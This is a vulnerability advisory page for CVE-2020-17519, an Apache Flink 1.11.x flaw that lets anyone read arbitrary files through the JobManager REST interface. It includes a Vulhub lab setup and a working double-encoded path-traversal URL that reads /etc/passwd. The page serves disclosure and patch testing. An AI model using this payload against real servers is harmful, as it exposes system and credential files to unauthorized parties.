CVE-2020-17519

7.5
7.5 / 10
HIGH

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

Weakness: Files or Directories Accessible to External Parties

The product makes files or directories accessible to unauthorized actors, even though they should not be.

Published: 2021-01-05

Community Advisory

This section is open source, for any additional information that enhances or clarifies the official advisory above.

Improve Advisory

CVE-2020-17519 Exploits (11)

Show all exploits (+1):

CVE-2020-17519 Vulnerable Docker Environment

Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.

Get Vulhub Docker

Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)

Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.

References:

  • https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
  • https://nvd.nist.gov/vuln/detail/CVE-2020-17519

Environment Setup

Execute following commands to start a Apache Flink jobmanager 1.11.2:

docker-compose up -d

After the Apache Flink is started, visit http://your-ip:8081 to view the homepage.

Exploit

Disclose the /etc/passwd:

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Official CVE References

View references (16)